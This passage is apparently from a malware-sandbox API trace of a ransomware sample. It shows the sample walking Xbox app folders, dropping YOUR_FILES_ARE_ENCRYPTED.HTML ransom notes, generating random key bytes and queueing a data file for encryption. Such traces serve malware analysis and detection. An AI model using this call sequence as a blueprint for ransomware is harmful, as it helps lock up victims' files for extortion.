lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.814] CloseHandle (hObject=0x324) returned 1 [0120.814] GetProcessHeap () returned 0x600000 [0120.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.814] GetProcessHeap () returned 0x600000 [0120.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.814] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.814] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.814] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache") returned 91 [0120.814] GetProcessHeap () returned 0x600000 [0120.814] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.814] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache" [0120.814] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\*" [0120.814] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.815] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.815] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 0 [0120.815] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.815] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0120.815] GetProcessHeap () returned 0x600000 [0120.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.815] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.816] CloseHandle (hObject=0x324) returned 1 [0120.816] GetProcessHeap () returned 0x600000 [0120.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.816] GetProcessHeap () returned 0x600000 [0120.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.817] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.817] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.817] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState") returned 91 [0120.817] GetProcessHeap () returned 0x600000 [0120.817] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.818] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState" [0120.818] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\*" [0120.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.818] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.818] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 0 [0120.818] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.818] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0120.818] GetProcessHeap () returned 0x600000 [0120.818] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.819] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.820] CloseHandle (hObject=0x324) returned 1 [0120.820] GetProcessHeap () returned 0x600000 [0120.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.820] GetProcessHeap () returned 0x600000 [0120.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.820] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6598ae0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0120.820] StrStrIW (lpFirst="Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.820] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe") returned 129 [0120.820] GetProcessHeap () returned 0x600000 [0120.820] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.820] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe" [0120.820] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\*" [0120.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6598ae0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.821] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6598ae0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.821] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66315ca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.821] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.821] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 145 [0120.821] GetProcessHeap () returned 0x600000 [0120.821] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.822] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore" [0120.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0120.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66315ca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.823] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66315ca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0120.823] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1ce836c9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x673c6ff, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x311bec0, dwReserved1=0x311b070, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.823] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.823] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 165 [0120.823] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.823] lstrlenW (lpString=".dat") returned 4 [0120.823] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.823] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\microsoft.xboxapp_9.9.30030.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.824] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=65536) returned 1 [0120.824] GetProcessHeap () returned 0x600000 [0120.824] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.826] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="1B") returned 2 [0120.826] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="71") returned 2 [0120.826] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="E2") returned 2 [0120.826] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="F2") returned 2 [0120.826] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="1E") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="E7") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="F3") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="58") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="A1") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="BF") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="6D") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="E4") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="92") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="29") returned 2 [0120.826] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="3A") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="7D") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3C") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="BB") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="A9") returned 2 [0120.827] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="79") returned 2 [0120.827] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="29") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="C7") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="B3") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="74") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="06") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="1F") returned 2 [0120.827] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="57") returned 2 [0120.827] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="2C") returned 2 [0120.827] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="B6") returned 2 [0120.827] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="D8") returned 2 [0120.827] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="E9") returned 2 [0120.827] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="10") returned 2 [0120.827] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0120.827] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.827] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.827] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x66315ca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x66315ca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66315ca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x311bec0, dwReserved1=0x311b070, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.827] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.828] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 170 [0120.828] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.828] lstrlenW (lpString=".LOG1") returned 5 [0120.828] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.828] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x66315ca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x66315ca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66315ca, 